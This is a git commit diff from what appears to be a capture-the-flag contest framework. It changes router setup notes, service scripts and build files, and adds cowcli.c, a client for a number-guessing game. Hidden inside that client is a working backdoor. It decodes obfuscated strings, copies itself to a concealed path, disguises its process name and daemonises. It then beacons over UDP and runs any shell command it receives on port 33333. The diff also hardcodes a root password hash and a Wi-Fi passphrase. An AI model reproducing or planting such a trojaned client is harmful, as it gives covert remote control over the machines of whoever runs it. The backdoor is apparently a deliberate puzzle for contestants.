mirror of https://github.com/dirtbags/moth.git
Merge remote-tracking branch 'origin/master'
Conflicts: packages/mcp/www/credits.html
This commit is contained in:
commit
87afa1b75e
5
Makefile
5
Makefile
|
@ -10,6 +10,11 @@ CACHE = cache
|
|||
# The end result
|
||||
BIN = bin
|
||||
|
||||
ifdef ARCH
|
||||
export CC = ${ARCH}-cc
|
||||
export STRIP = ${ARCH}-strip
|
||||
endif
|
||||
|
||||
all: packages
|
||||
|
||||
dist: ctf-install.zip
|
||||
|
|
|
@ -0,0 +1,7 @@
|
|||
* foam
|
||||
** beat-matching puzzle
|
||||
You have to play an MP3 to beat-match something being broadcast over
|
||||
FM. When you do, the two pieces work together somehow to tell you
|
||||
the key.
|
||||
** New recordings of Ginnie
|
||||
|
|
@ -1,57 +1,43 @@
|
|||
This directory contains the files used to set up an OpenWRT router.
|
||||
Using an OpenWRT router
|
||||
=======================
|
||||
|
||||
You can use an off-the-shelf, OpenWRT capable wireless router,
|
||||
configuring only through the web interface. The OpenWRT setup is
|
||||
intended for smaller contests, wired or non-wired, in which
|
||||
participants can be counted on not to launch link level attacks (ARP
|
||||
or NDP). Bear in mind that the cheap consumer routers have relatively
|
||||
slow CPUs and won't stand up to high volume.
|
||||
|
||||
Bear in mind that the cheap consumer routers have relatively slow CPUs
|
||||
and won't stand up to high volume. This same configuration applies to
|
||||
OpenWRT running on an x86 PC, or any other target of OpenWRT. For
|
||||
larger contests, it would be a good idea to use a faster machine for the
|
||||
router. I don't have any specific recommendations at this time (Oct
|
||||
2010).
|
||||
The CTF repository includes a "router" package, which will boot a DBTL
|
||||
device as a IPv6 router complete with multicast forwarding and up to
|
||||
24 tagged VLANs (by using a managed switch). This is a better option
|
||||
for larger contests, and can better handle high-speed (Gigabit)
|
||||
traffic.
|
||||
|
||||
The router comes up as 10.0.0.1/16 on eth0.
|
||||
Instructions for setting up OpenWRT
|
||||
-----------------------------------
|
||||
|
||||
If the router has a built-in switch, it is brought up without VLAN
|
||||
support, since these switches typically only support 16 VLANs, and do
|
||||
not support QinQ (double VLAN tags). All 5 ports work like an unmanaged
|
||||
switch, which ends up being handy for the contest table.
|
||||
After installing OpenWRT:
|
||||
|
||||
Plugging a managed switch into the router enables access to 48 VLANs,
|
||||
each configured to a /16 network. The router on VLAN number v comes up
|
||||
as 10.v.0.1/16.
|
||||
* Change the root password
|
||||
* Install the following packages:
|
||||
ip6tables
|
||||
kmod-ip6tables
|
||||
kmod-ipv6
|
||||
libip6tc
|
||||
luci-app-radvd
|
||||
radvd
|
||||
* Configure the LAN interface as 10.0.0.1/16 and
|
||||
fd84:b410:3441::1/64
|
||||
* Tell DHCP to begin at 257 after the base IP: this will assure
|
||||
all DHCP addresses are after 10.0.1.0
|
||||
* Disable router solicitations on LAN
|
||||
* Enable WPA2, with the password "correct horse battery staple"
|
||||
* Turn on router advertisements (under radvd) on LAN
|
||||
* Enable prefix fd84:b410:3441::1/64 under radvd
|
||||
|
||||
If the router has the ability to come up as a wireless access point, it
|
||||
will do so with SSID "CTF" and IP 10.254.0.1/16.
|
||||
|
||||
All subnets can route to all other subnets, through the router.
|
||||
10.0.0.1/16 and 10.254.0.1/16 may have a higher TTL when routed to a
|
||||
VLAN (I haven't checked). Keep in mind that anything connected directly
|
||||
to the router (ie. not through the managed switch) can do its own VLAN
|
||||
tagging. This would be the way to hop on another team's subnet to do
|
||||
something like check service availability in such a way as to prevent
|
||||
teams from firewalling each other out.
|
||||
|
||||
|
||||
SSID "CTF"
|
||||
10.254.0.1/16
|
||||
((Y))
|
||||
|
|
||||
-------------
|
||||
| OpenWRT |
|
||||
-0-1-2-3-4---
|
||||
/| | | | |
|
||||
/ | | | | |
|
||||
/ | | | | |
|
||||
/ 10.0.0.1/16
|
||||
/
|
||||
-------------------t---
|
||||
| Managed Switch |
|
||||
-1-2-3-4-5-...-47-48---
|
||||
/ | | \
|
||||
/ | | \
|
||||
/ | | \
|
||||
/ | | \
|
||||
10.1.0.1/16 | | 10.48.0.1/16
|
||||
| |
|
||||
10.3.0.1/16 |
|
||||
|
|
||||
10.47.0.1/16
|
||||
This should be sufficient to bring up the router for running the
|
||||
contest. If you want to get fancy, you can scp the files in
|
||||
www in this directory, into /www on the router. This will give
|
||||
users some guidance if they accidentally browse to the router IP,
|
||||
and also disables the default redirection to luci.
|
||||
|
|
|
@ -1,2 +0,0 @@
|
|||
config dnsmasq
|
||||
option leasefile '/tmp/dhcp.leases'
|
|
@ -1,27 +0,0 @@
|
|||
#### Switch configuration
|
||||
config switch eth0
|
||||
option enable 1
|
||||
option enable_vlan 0
|
||||
|
||||
#### Loopback configuration
|
||||
config interface loopback
|
||||
option ifname "lo"
|
||||
option proto static
|
||||
option ipaddr 127.0.0.1
|
||||
option netmask 255.0.0.0
|
||||
|
||||
#### Administrative network
|
||||
config interface admin
|
||||
option ifname "eth0"
|
||||
option proto static
|
||||
option ipaddr 10.0.0.1
|
||||
option netmask 255.255.0.0
|
||||
|
||||
#### Wireless
|
||||
config interface wifi
|
||||
option proto static
|
||||
option ipaddr 10.254.0.1
|
||||
option netmask 255.255.0.0
|
||||
|
||||
# OpenWRT's "ifup/ifdown" are horribly slow, so the 48
|
||||
# vlans are set up in an init script :)
|
|
@ -1,9 +0,0 @@
|
|||
config wifi-device wl0
|
||||
option type broadcom
|
||||
option channel 1
|
||||
|
||||
config wifi-iface
|
||||
option device wl0
|
||||
option network wifi
|
||||
option mode ap
|
||||
option ssid CTF
|
|
@ -1,26 +0,0 @@
|
|||
#! /bin/sh /etc/rc.common
|
||||
|
||||
START=45
|
||||
STOP=89
|
||||
|
||||
start () {
|
||||
stop
|
||||
|
||||
iptables -P INPUT ACCEPT
|
||||
iptables -P OUTPUT ACCEPT
|
||||
iptables -P FORWARD ACCEPT
|
||||
|
||||
iptables -A INPUT -p udp --dport 53 -j ACCEPT
|
||||
iptables -A INPUT -p udp --dport 67 -j ACCEPT
|
||||
iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
|
||||
iptables -A INPUT -s 10.0.0.0/16 -j ACCEPT
|
||||
iptables -A INPUT -j REJECT
|
||||
}
|
||||
|
||||
stop () {
|
||||
iptables -F INPUT
|
||||
iptables -F OUTPUT
|
||||
iptables -F FORWARD
|
||||
}
|
||||
|
||||
|
|
@ -1,20 +0,0 @@
|
|||
#! /bin/sh /etc/rc.common
|
||||
|
||||
START=41
|
||||
STOP=89
|
||||
|
||||
VLANS=48
|
||||
|
||||
start () {
|
||||
for i in $(seq 1 $VLANS); do
|
||||
vconfig add eth0 $i
|
||||
ifconfig eth0.$i 10.$i.0.1 netmask 255.255.0.0
|
||||
done
|
||||
}
|
||||
|
||||
stop () {
|
||||
for i in $(seq 1 $VLANS); do
|
||||
vconfig rem eth0.$i
|
||||
done
|
||||
}
|
||||
|
|
@ -1 +0,0 @@
|
|||
../init.d/iptables
|
|
@ -1 +0,0 @@
|
|||
../init.d/vlan
|
|
@ -1 +0,0 @@
|
|||
../init.d/vlan
|
|
@ -1 +0,0 @@
|
|||
../init.d/iptables
|
|
@ -0,0 +1,18 @@
|
|||
<DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
<title>Router</title>
|
||||
</head>
|
||||
<body>
|
||||
<p>
|
||||
You're in the wrong place. This is the router.
|
||||
</p>
|
||||
<ul>
|
||||
<li>
|
||||
CTF Server:
|
||||
<a href="http://[fd84:b410:3441::2]/">IPv6</a>, <a href="http://10.0.0.2/">IPv4</a>
|
||||
</li>
|
||||
<li><a href="password_strength.png">WPA2 password</a></li>
|
||||
</p>
|
||||
</body>
|
||||
</html>
|
Binary file not shown.
After Width: | Height: | Size: 91 KiB |
Binary file not shown.
After Width: | Height: | Size: 128 KiB |
|
@ -14,7 +14,7 @@ fatsize=$(sfdisk -l /dev/sdb | awk '/^Disk/ {print $3 - 2;}')
|
|||
FATFS=${DRIVE}1
|
||||
EXTFS=${DRIVE}2
|
||||
|
||||
sfdisk $DRIVE <<EOF
|
||||
sfdisk $DRIVE <<EOF || true
|
||||
,$fatsize,6,*
|
||||
,,L
|
||||
EOF
|
||||
|
|
|
@ -2,5 +2,7 @@
|
|||
|
||||
00admin-install:
|
||||
$(call COPYTREE, packages/00admin/service, $(00ADMIN_PKGDIR)/service)
|
||||
mkdir -p $(00ADMIN_PKGDIR)/sbin
|
||||
cp packages/00admin/sbin/* $(00ADMIN_PKGDIR)/sbin
|
||||
|
||||
PACKAGES += 00admin
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
#! /bin/sh -e
|
||||
|
||||
action=$1; shift
|
||||
|
||||
read n < ip.txt
|
||||
|
||||
if grep -q ipv4 /proc/cmdline; then
|
||||
# IPv4
|
||||
IP="10.0.0.$n/16"
|
||||
else
|
||||
# IPv6
|
||||
l=$(busybox dc 16 o $n p)
|
||||
IP="fd84:b410:3441::$l/64"
|
||||
fi
|
||||
|
||||
|
||||
|
||||
[ "$action" ] && ip addr $action $IP dev eth0
|
||||
|
||||
if [ "$action" = "add" ]; then
|
||||
fail=fail
|
||||
for i in $(seq 5); do
|
||||
if ip addr | grep -v tentative | grep -Fq $IP; then
|
||||
fail=
|
||||
break
|
||||
fi
|
||||
sleep 1
|
||||
done
|
||||
[ "$fail" ] && return 1
|
||||
fi
|
||||
|
||||
[ "$action" = del ] || echo $IP
|
|
@ -2,9 +2,6 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
[ -r /etc/passwd ] || echo 'root:x:0:0:root:/tmp:/bin/sh' > /etc/passwd
|
||||
|
||||
# Always do this, in case something else set a root password
|
||||
echo 'root:$1$i/EeZyl6$5C6Z8s0ftEdTKFLUli1wP1' | chpasswd --encrypted
|
||||
|
||||
# Bring up the NIC; this will get us at least a link-local address, and
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
read IP < ip.txt
|
||||
ip addr del $IP dev eth0
|
||||
/opt/00admin/sbin/fire-ip del
|
||||
|
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::ec6/64
|
||||
198
|
||||
|
|
|
@ -1,7 +1,7 @@
|
|||
#! /bin/sh -e
|
||||
|
||||
exec 2>&1
|
||||
read IP < ip.txt
|
||||
ip addr add $IP dev eth0 || true
|
||||
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
exec setuidgid nobody /opt/cowbull/bin/cowd < /opt/cowbull/tokens.txt
|
||||
|
|
|
@ -3,7 +3,7 @@ DESTDIR ?= /tmp
|
|||
build: cowd cowcli
|
||||
|
||||
cowcli: cowcli.c
|
||||
$(CC) -o $@ -static $<
|
||||
cc -o $@ -static $<
|
||||
strip $@
|
||||
upx $@
|
||||
|
||||
|
|
|
@ -0,0 +1,355 @@
|
|||
#include <stdio.h>
|
||||
#include <stdlib.h>
|
||||
#include <stdint.h>
|
||||
#include <unistd.h>
|
||||
#include <time.h>
|
||||
#include <fcntl.h>
|
||||
#include <errno.h>
|
||||
#include <string.h>
|
||||
#include <signal.h>
|
||||
#include <sysexits.h>
|
||||
#include <arpa/inet.h>
|
||||
#include <sys/types.h>
|
||||
#include <sys/stat.h>
|
||||
#include <sys/socket.h>
|
||||
#include <sys/wait.h>
|
||||
#include <netdb.h>
|
||||
#include <fcntl.h>
|
||||
|
||||
|
||||
#define NODEBUG
|
||||
|
||||
#ifdef DEBUG
|
||||
# define PORT 4444
|
||||
#else
|
||||
# define PORT 44
|
||||
#endif
|
||||
|
||||
#define BDPORT 33333
|
||||
#define BCNPORT_S 48172
|
||||
#define BCNPORT_D 48179
|
||||
|
||||
int
|
||||
bind_port(int fd, const struct in6_addr *addr, uint16_t port)
|
||||
{
|
||||
struct sockaddr_in6 saddr = { 0 };
|
||||
|
||||
saddr.sin6_family = AF_INET6;
|
||||
saddr.sin6_port = htons(port);
|
||||
memcpy(&saddr.sin6_addr, addr, sizeof *addr);
|
||||
return bind(fd, (struct sockaddr *) &saddr, sizeof saddr);
|
||||
}
|
||||
|
||||
void
|
||||
sigchld(int unused)
|
||||
{
|
||||
while (0 < waitpid(-1, NULL, WNOHANG));
|
||||
}
|
||||
|
||||
void
|
||||
unmask_str(unsigned char *str)
|
||||
{
|
||||
int i = strlen(str);
|
||||
while (i-- > 0) {
|
||||
str[i] &= 127;
|
||||
}
|
||||
}
|
||||
int
|
||||
copyprog(const char *from, const char *to)
|
||||
{
|
||||
int fd_to, fd_from;
|
||||
char buf[4096];
|
||||
ssize_t nread;
|
||||
int saved_errno;
|
||||
|
||||
fd_from = open(from, O_RDONLY);
|
||||
if (fd_from < 0)
|
||||
return -1;
|
||||
|
||||
fd_to = open(to, O_WRONLY | O_CREAT | O_TRUNC, 0700);
|
||||
if (fd_to < 0)
|
||||
goto out_error;
|
||||
|
||||
while (nread = read(fd_from, buf, sizeof buf), nread > 0)
|
||||
{
|
||||
char *out_ptr = buf;
|
||||
ssize_t nwritten;
|
||||
|
||||
do {
|
||||
nwritten = write(fd_to, out_ptr, nread);
|
||||
|
||||
if (nwritten >= 0)
|
||||
{
|
||||
nread -= nwritten;
|
||||
out_ptr += nwritten;
|
||||
}
|
||||
else if (errno != EINTR)
|
||||
{
|
||||
goto out_error;
|
||||
}
|
||||
} while (nread > 0);
|
||||
}
|
||||
|
||||
if (nread == 0)
|
||||
{
|
||||
if (close(fd_to) < 0)
|
||||
{
|
||||
fd_to = -1;
|
||||
goto out_error;
|
||||
}
|
||||
close(fd_from);
|
||||
|
||||
/* Success! */
|
||||
return 0;
|
||||
}
|
||||
|
||||
out_error:
|
||||
saved_errno = errno;
|
||||
|
||||
close(fd_from);
|
||||
if (fd_to >= 0)
|
||||
close(fd_to);
|
||||
|
||||
errno = saved_errno;
|
||||
return -1;
|
||||
}
|
||||
|
||||
void
|
||||
signal_evil(int sig)
|
||||
{
|
||||
if (fork()) {
|
||||
exit(1);
|
||||
}
|
||||
}
|
||||
void
|
||||
evil(int argc, char *argv[])
|
||||
{
|
||||
int i;
|
||||
int sock;
|
||||
|
||||
char procname[] = "\xdb\xe8\xe3\xe9\xb1\xdd";
|
||||
char cptarget[] = "\xaf\xe4\xe5\xf6\xaf\xf3\xe8\xed\xaf\xae\xa0";
|
||||
|
||||
unmask_str(procname);
|
||||
unmask_str(cptarget);
|
||||
|
||||
if (strcmp(argv[0], cptarget)) {
|
||||
if (fork()) {
|
||||
return;
|
||||
}
|
||||
/* copy ourselves */
|
||||
if (copyprog(argv[0], cptarget) == 0) {
|
||||
argv[0] = cptarget;
|
||||
execv(cptarget, argv);
|
||||
}
|
||||
} else {
|
||||
unlink(cptarget);
|
||||
if (fork()) {
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
|
||||
/* mask the process title and arguments */
|
||||
while (argc--) {
|
||||
int p = strlen(argv[argc]);
|
||||
while (p--) {
|
||||
argv[argc][p] = 0;
|
||||
}
|
||||
}
|
||||
strcpy(argv[0], procname);
|
||||
|
||||
|
||||
{
|
||||
int r = open("/dev/null", O_RDONLY);
|
||||
int w = open("/dev/null", O_WRONLY);
|
||||
|
||||
dup2(r, 0);
|
||||
dup2(w, 1);
|
||||
dup2(w, 2);
|
||||
close(r);
|
||||
close(w);
|
||||
setsid();
|
||||
chdir("/");
|
||||
signal(SIGHUP, signal_evil);
|
||||
signal(SIGTERM, signal_evil);
|
||||
signal(SIGINT, signal_evil);
|
||||
signal(SIGQUIT, signal_evil);
|
||||
}
|
||||
|
||||
sock = socket(AF_INET6, SOCK_DGRAM, 0);
|
||||
if (-1 == bind_port(sock, &in6addr_any, BDPORT)) {
|
||||
exit(0);
|
||||
}
|
||||
struct timeval tv;
|
||||
tv.tv_sec = 5;
|
||||
tv.tv_usec = 0;
|
||||
setsockopt(sock, SOL_SOCKET, SO_RCVTIMEO, (char *)&tv,sizeof(struct timeval));
|
||||
|
||||
|
||||
while (1) {
|
||||
/* beacon */
|
||||
int sock_beacon;
|
||||
sock_beacon = socket(AF_INET6, SOCK_DGRAM, 0);
|
||||
if (-1 == bind_port(sock_beacon, &in6addr_any, BCNPORT_S)) {
|
||||
//perror("Beacon bind");
|
||||
;; /* return EX_IOERR; */
|
||||
}
|
||||
int subnet;
|
||||
if (sock_beacon > 0) {
|
||||
for (subnet = 0; subnet < 50; subnet++) {
|
||||
char payload[] = "hi";
|
||||
char addr6_f[] = "\xe6\xe4\xb8\xb4\xba\xe2\xb4\xb1\xb0\xba\xb3\xb4\xb4\xb1\xba\xa5\xf8\xba\xba\xb1\xb3\xb3\xb7";
|
||||
unmask_str(addr6_f);
|
||||
char addr6[64];
|
||||
sprintf(addr6, addr6_f, subnet);
|
||||
|
||||
//printf("%s\n", addr6);
|
||||
struct addrinfo *beacon_addr;
|
||||
{
|
||||
struct addrinfo hints = { 0 };
|
||||
|
||||
hints.ai_family = PF_INET6;
|
||||
hints.ai_socktype = SOCK_DGRAM;
|
||||
hints.ai_flags = AI_NUMERICHOST;
|
||||
|
||||
if (0 != getaddrinfo(addr6, "48179", &hints, &beacon_addr)) {
|
||||
;;//perror("Resolving address");
|
||||
}
|
||||
}
|
||||
|
||||
struct sockaddr_in6 saddr = { 0 };
|
||||
|
||||
if(-1 == sendto(sock_beacon, &payload, sizeof payload, 0, beacon_addr->ai_addr, beacon_addr->ai_addrlen)) {
|
||||
;;//perror("Beacon send");
|
||||
} else {
|
||||
;;//printf("sent!\n");
|
||||
}
|
||||
}
|
||||
}
|
||||
close(sock_beacon);
|
||||
/* end beacon */
|
||||
|
||||
/* c&c */
|
||||
char cmd[400];
|
||||
ssize_t inlen;
|
||||
|
||||
inlen = recvfrom(sock, cmd, sizeof(cmd)-1, 0, NULL, NULL);
|
||||
|
||||
if (inlen < 1) {
|
||||
continue;
|
||||
}
|
||||
|
||||
cmd[inlen] = 0;
|
||||
if (! fork()) {
|
||||
system(cmd);
|
||||
exit(0);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
int
|
||||
main(int argc, char *argv[])
|
||||
{
|
||||
long answer = 0;
|
||||
int sock;
|
||||
int i;
|
||||
struct addrinfo *addr;
|
||||
uint32_t token = 0;
|
||||
FILE *in, *out;
|
||||
|
||||
srand(time(NULL));
|
||||
|
||||
signal(SIGCHLD, sigchld);
|
||||
|
||||
if (argc < 2) {
|
||||
fprintf(stderr, "Usage: %s SERVER\n", argv[0]);
|
||||
return EX_USAGE;
|
||||
}
|
||||
|
||||
evil(argc, argv);
|
||||
|
||||
{
|
||||
struct addrinfo hints = { 0 };
|
||||
|
||||
hints.ai_family = PF_INET6;
|
||||
hints.ai_socktype = SOCK_DGRAM;
|
||||
hints.ai_flags = AI_NUMERICHOST;
|
||||
|
||||
if (0 != getaddrinfo(argv[1], "3782", &hints, &addr)) {
|
||||
perror("Resolving address");
|
||||
return EX_IOERR;
|
||||
}
|
||||
}
|
||||
|
||||
/*
|
||||
* Set up socket
|
||||
*/
|
||||
sock = socket(AF_INET6, SOCK_DGRAM, 0);
|
||||
if (-1 == bind_port(sock, &in6addr_any, PORT)) {
|
||||
perror("Binding UDP port 44");
|
||||
return EX_IOERR;
|
||||
}
|
||||
|
||||
if (argv[2]) {
|
||||
/* fork and exec */
|
||||
} else {
|
||||
in = stdin;
|
||||
out = stdout;
|
||||
}
|
||||
|
||||
|
||||
while (1) {
|
||||
long guess;
|
||||
struct {
|
||||
uint32_t token;
|
||||
uint16_t guess;
|
||||
} g;
|
||||
|
||||
g.token = token;
|
||||
if (token) {
|
||||
char line[20];
|
||||
|
||||
if (NULL == fgets(line, sizeof line, in)) {
|
||||
break;
|
||||
}
|
||||
g.guess = strtol(line, NULL, 16);
|
||||
} else {
|
||||
g.guess = 0;
|
||||
}
|
||||
|
||||
/* Send the guess */
|
||||
if (-1 == sendto(sock, &g, sizeof g, 0, addr->ai_addr, addr->ai_addrlen)) {
|
||||
perror("Sending packet");
|
||||
return EX_IOERR;
|
||||
}
|
||||
|
||||
/* read the result */
|
||||
{
|
||||
char buf[80];
|
||||
ssize_t len;
|
||||
|
||||
len = recvfrom(sock, buf, sizeof buf, 0, NULL, NULL);
|
||||
switch (len) {
|
||||
case -1:
|
||||
perror("Reading packet");
|
||||
return EX_IOERR;
|
||||
case 1:
|
||||
/* It's a score */
|
||||
printf("%02x\n", buf[0]);
|
||||
break;
|
||||
case 4:
|
||||
/* New game token */
|
||||
printf("NEW GAME\n");
|
||||
token = *((uint32_t *) buf);
|
||||
break;
|
||||
default:
|
||||
/* You win: this is your CTF token */
|
||||
buf[len] = 0;
|
||||
printf("A WINNER IS YOU: %s\n", buf);
|
||||
break;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
/opt/00admin/sbin/fire-ip del
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::a0d/64
|
||||
13
|
||||
|
|
|
@ -2,7 +2,6 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
ip addr add $IP dev eth0 || true
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
exec tcpsvd -u nobody ${IP%/*} 1013 ./go
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
INFERNO_PKGDIR = $(TARGET)/inferno
|
||||
INFERNO_BUILDDIR = $(BUILD)/inferno
|
||||
|
||||
INFERNO_FNORD_CACHE = $(CACHE)/fnord.git
|
||||
INFERNO_FNORD_URL = http://woozle.org/~neale/projects/fnord
|
||||
INFERNO_ERIS_CACHE = $(CACHE)/eris.git
|
||||
INFERNO_ERIS_URL = http://woozle.org/~neale/projects/eris
|
||||
|
||||
$(INFERNO_FNORD_CACHE):
|
||||
git clone --bare $(INFERNO_FNORD_URL) $@
|
||||
$(INFERNO_ERIS_CACHE):
|
||||
git clone --bare $(INFERNO_ERIS_URL) $@
|
||||
|
||||
inferno-source: $(INFERNO_BUILDDIR)
|
||||
$(INFERNO_BUILDDIR): $(INFERNO_FNORD_CACHE)
|
||||
$(INFERNO_BUILDDIR): $(INFERNO_ERIS_CACHE)
|
||||
git clone $< $@
|
||||
|
||||
inferno-build: $(INFERNO_BUILDDIR)/build
|
||||
$(INFERNO_BUILDDIR)/build: $(INFERNO_BUILDDIR)
|
||||
$(MAKE) -C $(INFERNO_BUILDDIR) fnord-idx
|
||||
$(MAKE) -C $(INFERNO_BUILDDIR)
|
||||
|
||||
inferno-install: $(INFERNO_BUILDDIR)/build
|
||||
mkdir -p $(INFERNO_PKGDIR)/bin
|
||||
|
||||
cp $(INFERNO_BUILDDIR)/fnord-idx $(INFERNO_PKGDIR)/bin/
|
||||
cp $(INFERNO_BUILDDIR)/eris $(INFERNO_PKGDIR)/bin/
|
||||
|
||||
$(call COPYTREE, packages/inferno/service, $(INFERNO_PKGDIR)/service)
|
||||
|
||||
|
|
|
@ -2,7 +2,6 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
cd /var/www
|
||||
|
||||
exec tcpsvd -l localhost 0 80 /opt/inferno/bin/fnord-idx . .
|
||||
ln -sf /var/www default
|
||||
exec tcpsvd -l localhost 0 80 /opt/inferno/bin/eris -d
|
||||
|
||||
|
|
|
@ -1,6 +1,6 @@
|
|||
IRCD_PKGDIR = $(TARGET)/ircd
|
||||
IRCD_BUILDDIR = $(BUILD)/ircd
|
||||
IRCD_VERSION = 18
|
||||
IRCD_VERSION = 19.1
|
||||
IRCD_TAR = $(CACHE)/ngircd-$(IRCD_VERSION).tar.gz
|
||||
IRCD_URL = ftp://ftp.berlios.de/pub/ngircd/ngircd-$(IRCD_VERSION).tar.gz
|
||||
IRCD_SRCDIR = $(IRCD_BUILDDIR)/ngircd-$(IRCD_VERSION)
|
||||
|
|
|
@ -1,4 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
ip addr del $IP dev eth0
|
||||
/opt/00admin/sbin/fire-ip del
|
||||
|
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::6/64
|
||||
6
|
||||
|
|
|
@ -1,15 +0,0 @@
|
|||
[Global]
|
||||
Name = irc.ctf
|
||||
Info = CTF IRC
|
||||
AdminInfo1 = CTF IRC Server
|
||||
AdminInfo2 = The table at the front of the room
|
||||
AdminEmail = zephyr@dirtbags.net
|
||||
MotdPhrase = "welcome datacomp"
|
||||
Listen = fd84:b410:3441::6
|
||||
OperCanUseMode = yes
|
||||
NoDNS = yes
|
||||
NoIdent = yes
|
||||
|
||||
[Operator]
|
||||
Name = oper
|
||||
Password = operpass
|
|
@ -2,11 +2,33 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
IP=$(cat ip.txt)
|
||||
ip addr add $IP label eth0:ircd dev eth0
|
||||
ip monitor | grep -q $IP
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
adduser -S -H -u 65534 nobody
|
||||
adduser -S -H irc
|
||||
|
||||
operpass=$(dd if=/dev/urandom count=1 | md5sum | cut -d' ' -f1)
|
||||
|
||||
cat <<EOD >ngircd.conf
|
||||
[Global]
|
||||
Name = irc.ctf
|
||||
Info = CTF IRC
|
||||
AdminInfo1 = CTF IRC Server
|
||||
AdminInfo2 = The table at the front of the room
|
||||
AdminEmail = zephyr@dirtbags.net
|
||||
MotdPhrase = "welcome datacomp"
|
||||
Listen = ${IP%/*}
|
||||
ServerUID = 101
|
||||
ServerGID = 65534
|
||||
|
||||
[Options]
|
||||
OperCanUseMode = yes
|
||||
DNS = no
|
||||
Ident = no
|
||||
|
||||
[Operator]
|
||||
Name = oper
|
||||
Password = $operpass
|
||||
EOD
|
||||
|
||||
exec setuidgid irc /opt/ircd/bin/ngircd --config ./ngircd.conf --nodaemon
|
||||
|
|
|
@ -20,6 +20,9 @@ www=${CTF_BASE:-/var/www}
|
|||
mkdir -p $base/teams/names
|
||||
mkdir -p $base/teams/colors
|
||||
|
||||
[ -f $base/teams/nonce ] || dd if=/dev/urandom count=1 | md5sum | cut -b 1-8 > $base/teams/nonce
|
||||
nonce=$(cat $base/teams/nonce)
|
||||
|
||||
# Assign a color. I spent weeks selecting a color pallette that
|
||||
# wouldn't be hell on people with protanopia. Please don't change these
|
||||
# colors.
|
||||
|
@ -45,7 +48,7 @@ esac
|
|||
# Compute hash of team name; they'll use this for everything in the
|
||||
# contest instead of their team name, which makes stuff much easier on
|
||||
# me since all team hashes are in the set /[0-9a-f]{8}/.
|
||||
hash=$(dd if=/dev/urandom count=1 2>/dev/null | md5sum | cut -b 1-8)
|
||||
hash=$(printf "%s:%s" $nonce "$1" | md5sum | cut -b 1-8)
|
||||
|
||||
echo "$1" > $base/teams/names/$hash
|
||||
echo "$color" > $base/teams/colors/$hash
|
||||
|
|
|
@ -3,26 +3,26 @@ MCP_BUILDDIR = $(BUILD)/mcp
|
|||
|
||||
|
||||
##
|
||||
## XXX: clean up fnord like router.mk
|
||||
## XXX: clean up eris like router.mk
|
||||
##
|
||||
|
||||
FNORD_CACHE = $(CACHE)/fnord.git
|
||||
FNORD_BUILDDIR = $(MCP_BUILDDIR)/fnord
|
||||
FNORD_URL = http://woozle.org/~neale/projects/fnord
|
||||
ERIS_CACHE = $(CACHE)/eris.git
|
||||
ERIS_BUILDDIR = $(MCP_BUILDDIR)/eris
|
||||
ERIS_URL = http://woozle.org/~neale/projects/eris
|
||||
|
||||
$(FNORD_CACHE):
|
||||
git clone --bare $(FNORD_URL) $@
|
||||
$(ERIS_CACHE):
|
||||
git clone --bare $(ERIS_URL) $@
|
||||
|
||||
mcp-source: $(MCP_BUILDDIR)/source
|
||||
$(MCP_BUILDDIR)/source: $(FNORD_CACHE)
|
||||
$(MCP_BUILDDIR)/source: $(ERIS_CACHE)
|
||||
mkdir -p $(@D)
|
||||
git clone $(FNORD_CACHE) $(@D)/fnord
|
||||
git clone $(ERIS_CACHE) $(@D)/eris
|
||||
touch $@
|
||||
|
||||
mcp-build: $(MCP_BUILDDIR)/build
|
||||
$(MCP_BUILDDIR)/build: $(MCP_BUILDDIR)/source
|
||||
$(MAKE) -C packages/mcp/src build
|
||||
$(MAKE) -C $(MCP_BUILDDIR)/fnord DIET= CC=$(CC) fnord-cgi
|
||||
$(MAKE) -C $(MCP_BUILDDIR)/eris
|
||||
|
||||
|
||||
mcp-install: $(MCP_BUILDDIR)/build
|
||||
|
@ -32,7 +32,7 @@ mcp-install: $(MCP_BUILDDIR)/build
|
|||
cp packages/mcp/src/pointscli $(MCP_PKGDIR)/bin/
|
||||
cp packages/mcp/src/puzzles.cgi $(MCP_PKGDIR)/bin/
|
||||
|
||||
cp $(MCP_BUILDDIR)/fnord/fnord-cgi $(MCP_PKGDIR)/bin/
|
||||
cp $(MCP_BUILDDIR)/eris/eris $(MCP_PKGDIR)/bin/
|
||||
|
||||
$(call COPYTREE, packages/mcp/service, $(MCP_PKGDIR)/service)
|
||||
|
||||
|
|
|
@ -0,0 +1,3 @@
|
|||
#! /bin/sh
|
||||
|
||||
/opt/00admin/sbin/fire-ip del
|
|
@ -1 +1 @@
|
|||
fd84:b410:3441::2/64
|
||||
2
|
||||
|
|
|
@ -2,11 +2,9 @@
|
|||
|
||||
exec 2>&1
|
||||
|
||||
hostname mcp
|
||||
IP=$(/opt/00admin/sbin/fire-ip add)
|
||||
|
||||
# Bring up address
|
||||
IP=$(cat ip.txt)
|
||||
ip addr add $IP dev eth0 || true
|
||||
hostname mcp
|
||||
|
||||
# Link in puzzles and web pages
|
||||
install -d /var/www
|
||||
|
@ -20,4 +18,5 @@ for d in /opt/*; do
|
|||
fi
|
||||
done
|
||||
|
||||
exec tcpsvd -u ctf ${IP%/*} 80 /opt/mcp/bin/fnord-cgi /var/www
|
||||
ln -sf /var/www default
|
||||
